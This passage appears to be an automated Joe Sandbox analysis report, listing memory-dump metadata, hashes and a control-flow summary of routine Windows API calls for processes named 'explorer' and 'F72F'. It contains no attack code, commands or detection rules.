                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: af7ad4f5f70b74026db62b8d6cccabb1b27c434e51a3615d0da43ec78f6b08ad
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49018136616B8482EB48DF26E8A035D7361F788FD0F188425DA5A13754CF38C592C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: d5afd2326a24029f0b7c2689920833ca06cde26b49d9d0d783fabce0087a4ea1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5016235615B41C6DB549F26E4943297761FF48BD4F088035DA1A03F25CF38E052C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: e2752378e221ab88e5952cb37410dce8704dae7d62b6d7a8432515f1b2e24925
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EED05E30A4520786FB3832A95A3133830469B42108FC2383CC701952C2DC98C4828322
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: f119a7990e79073126d5e2c80f7f6f8382019ce49f56a9246b0253426d4d2ea2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0D01728961A1B86EABC33A559317382046FB46106F80383C8615893C1DD5884C38232
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: 476ca8ac3e5794ba78b851244969811a227d331b223de1982fcf4a1869825407
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88D05E3099120F82FA7832F599713BA20C59B86385FCC4C3DC7018B2C4DC098C828723
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 7f1ecc748ba9ebab870b95430186598c5b7fc2f1ddd124084a959bd0311212d9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7011A32610946E2EB449F95E8903B833B0FB98B89F459033CA1B86674DE78C2D9C764
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 72e62fd792546965fe805ddb63528c3fb9cecc661ebfdd8da67cc4acc5faf4a8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7015AB27209C5D2EB089F16E9A03D833B0F798B48F451822DB5A567A4DF38C1DAC745
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 3c65e4f88820ad74df980463a4c97917ef266156f1b66fe8b8968a1a79c5690c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30010832610D47D2EB649F15E8907B833A0FF98BC8F851032CA1A86A64DF38C1DBD744

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:8.3%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:38
                                                                                                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                                                                                                        execution_graph 29784 274d300 DuplicateHandle 29785 274d396 29784->29785 29786 2744668 29787 2744684 29786->29787 29788 2744696 29787->29788 29790 27447a0 29787->29790 29791 27447a4 29790->29791 29795 27448b0 29791->29795 29799 27448a1 29791->29799 29796 27448d7 29795->29796 29798 27449b4 29796->29798 29803 2744248 29796->29803 29801 27448a4 29799->29801 29800 27449b4 29800->29800 29801->29800 29802 2744248 CreateActCtxA 29801->29802 29802->29800 29804 2745940 CreateActCtxA 29803->29804 29806 2745a03 29804->29806 29807 274ad38 29811 274ae30 29807->29811 29816 274ae20 29807->29816 29808 274ad47 29812 274ae64 29811->29812 29813 274ae41 29811->29813 29812->29808 29813->29812 29814 274b068 GetModuleHandleW 29813->29814 29815 274b095 29814->29815 29815->29808 29818 274ae24 29816->29818 29817 274ae64 29817->29808 29818->29817 29819 274b068 GetModuleHandleW 29818->29819 29820 274b095 29819->29820 29820->29808 29821 274d0b8 29822 274d0fe GetCurrentProcess 29821->29822 29824 274d150 GetCurrentThread 29822->29824 29825 274d149 29822->29825 29826 274d186 29824->29826 29827 274d18d GetCurrentProcess 29824->29827 29825->29824 29826->29827 29830 274d1c3 29827->29830 29828 274d1eb GetCurrentThreadId 29829 274d21c 29828->29829 29830->29828

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 006a790dc2046addbe184d71849090f78f45c9c8b40e27241c10f89a86e17654
                                                                                                                                                                                                                        • Instruction ID: b7c7ca92cec4b8a61b8f5772701aab3f34dfb6c276271eb9d82c26f201253249
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 006a790dc2046addbe184d71849090f78f45c9c8b40e27241c10f89a86e17654
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8528B30A003099FDB15EF74D894AAEBBB2BFC5301F548968D8469F295DF74AC45CBA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 39b46479a3bcf04637eb93281b58af03159a20757488b3054325cc465c2a6ddd
                                                                                                                                                                                                                        • Instruction ID: a0512ef0047d54118ddb9dc9824c9631d1ca35a5b2e623f6bba4621db556e96f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39b46479a3bcf04637eb93281b58af03159a20757488b3054325cc465c2a6ddd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD1AE31B00306AFEB14EB65D894B6DBBB3FFC4300F808968D55A9B690DF70AC458B91
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 588363dd0e746ed35b0b633944dfa750ece02fc095a70ac7522a0483f38cffb4
                                                                                                                                                                                                                        • Instruction ID: b5fc1c1c854bdaae506bfb1ea5806c0306989bf6b866eb44b8c6658eaff15587
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 588363dd0e746ed35b0b633944dfa750ece02fc095a70ac7522a0483f38cffb4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47C18F31A1030A9FDB15EF65E884B7AB7B3BF84301F409968D90A9B655DB70FC45CBA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D136
                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0274D173
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D1B0
                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0274D209
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                        • Opcode ID: 3a0df716eb19512a1769fc828f2a108cfdff55929586e1f96bb3f5fff52f3654
                                                                                                                                                                                                                        • Instruction ID: c440fd7fb038994751c7e0d210a9b1ab9bc14508b6247e2b19a9762fbbb81b18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0df716eb19512a1769fc828f2a108cfdff55929586e1f96bb3f5fff52f3654
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E5159B090034ACFDB14DFAAD548B9EBBF1BF88314F258459D419A73A0DB345844CF66

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D136
                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0274D173
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D1B0
                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0274D209
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                        • Opcode ID: c055a1f46412fe2c4a94ada0d77d60273d05a15d038d6fc68c2862d898703b28
                                                                                                                                                                                                                        • Instruction ID: cbc226dd5055ccc8176026d0b1cbac57a2e4bb95d0b4af4228d1ed932e592936
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c055a1f46412fe2c4a94ada0d77d60273d05a15d038d6fc68c2862d898703b28
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE5137B090034ACFDB14DFAAD548B9EBBF1BF88314F258459E419A73A0DB345944CF66

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B086
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                        • Opcode ID: b3f5a1ddb459139d13eaf60de6d61fb11b1bc5bfa20b15660fac7431182f569e
                                                                                                                                                                                                                        • Instruction ID: 9a7775de18af3098a1904f84bfece7094640e598adbb3bef9d5284a2e87c2dc4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3f5a1ddb459139d13eaf60de6d61fb11b1bc5bfa20b15660fac7431182f569e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B38156B0A00B058FDB25DF29C05579ABBF5FF89304F008A2DD49A9BA50DB75E846CB90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 027459F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: 50b73fb994cf54c9b65bc97327d5b47162625fd7b683319efe24430c76b0e01e
                                                                                                                                                                                                                        • Instruction ID: 585f404bb11d1ecfa93d70cf25dd317b0aed396e2ed71138f0a63c3e3d3437e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50b73fb994cf54c9b65bc97327d5b47162625fd7b683319efe24430c76b0e01e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541F2B0D0071DCFEB24DFA9C884B9EBBB5BF88714F60816AD508AB250DB756945CF50

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 129 2744248-2745a01 CreateActCtxA 132 2745a03-2745a09 129->132 133 2745a0a-2745a64 129->133 132->133 140 2745a66-2745a69 133->140 141 2745a73-2745a77 133->141 140->141 142 2745a88 141->142 143 2745a79-2745a85 141->143 145 2745a89 142->145 143->142 145->145
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 027459F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: 276d8eb8d8cb39387277adcf47f4216a4565c8a5587e599eb2848553742aa6e2
                                                                                                                                                                                                                        • Instruction ID: ffb24e03dd1219d567dd734423c3fb81010a33fad3166df05f76232b0bc9747f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276d8eb8d8cb39387277adcf47f4216a4565c8a5587e599eb2848553742aa6e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5141F0B0D00319CFEB24DFA9C884B8EBBB5BF88704F20806AD409AB250DB756945CF90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 172 274d2f9-274d2fe 173 274d300-274d394 DuplicateHandle 172->173 174 274d396-274d39c 173->174 175 274d39d-274d3ba 173->175 174->175
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0274D387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 197eb890894effb8db5d10d9cc2136808a8f6fd07cb909704217712169ad2a8e
                                                                                                                                                                                                                        • Instruction ID: bd49cd2be7e74f34ef26c39874dbfc8f2969d1ef544fe05e18091a8f47baa897
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 197eb890894effb8db5d10d9cc2136808a8f6fd07cb909704217712169ad2a8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F21E6B5900349DFDB10CF9AD484ADEBBF5FB48324F14802AE958A3350C774A954CF61

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 178 274d300-274d394 DuplicateHandle 179 274d396-274d39c 178->179 180 274d39d-274d3ba 178->180 179->180
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0274D387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 8e4a734c9a26b3e1d7dc6ac5164c934242c67e117c8ce0ff1c79795ddfdd8892
                                                                                                                                                                                                                        • Instruction ID: d9f03e0c2f510a10df84d7f8ea38785138284c49d796d7950ea2b9cdca5b3226
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e4a734c9a26b3e1d7dc6ac5164c934242c67e117c8ce0ff1c79795ddfdd8892
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F621E6B5900349DFDB10CF9AD484ADEBBF5FB48314F14801AE958A3350C774A950CF61

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 183 274b020-274b060 185 274b062-274b065 183->185 186 274b068-274b093 GetModuleHandleW 183->186 185->186 187 274b095-274b09b 186->187 188 274b09c-274b0b0 186->188 187->188
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B086
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                        • Opcode ID: f3aa7a4c57c02a45621c7032e324eb0fe8ffc7983494fccf2754344304c2f06e
                                                                                                                                                                                                                        • Instruction ID: f9d93ad9349a95f51488a80437dd28db1a9428b27369ce250525989b4d4d9926
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3aa7a4c57c02a45621c7032e324eb0fe8ffc7983494fccf2754344304c2f06e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4411DFB5D003498FDB20DF9AC444B9EFBF4AB89624F11842AD429A7610C779A945CFA1

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7f37391cdb5ac95d9c486ae947877c160660d240b18f2210b0e9953c6d0fb208
                                                                                                                                                                                                                        • Instruction ID: 6865fbc99713af53309b3a0c227e3ba699a9db23ed8865ee92c233eb8ca442e5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f37391cdb5ac95d9c486ae947877c160660d240b18f2210b0e9953c6d0fb208
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B126935A042048FDB15DF65D4A4AAEBBF2BF88300F168469E846DB391DB74ED41CFA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: d7242ecfdf79c5003cebfd35a7f1860636637a09645a0e80d5550b5060dee7b8
                                                                                                                                                                                                                        • Instruction ID: 0c36faa572f05b9570911218a1be7a8db20ffccffefacd028ea91d94bfaf83ca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7242ecfdf79c5003cebfd35a7f1860636637a09645a0e80d5550b5060dee7b8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6124B31A003099FDB15EF64D484AADBBB2FF85301F54CAA8D44A9F65ACB70AC45CF91

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Memory Dump Source
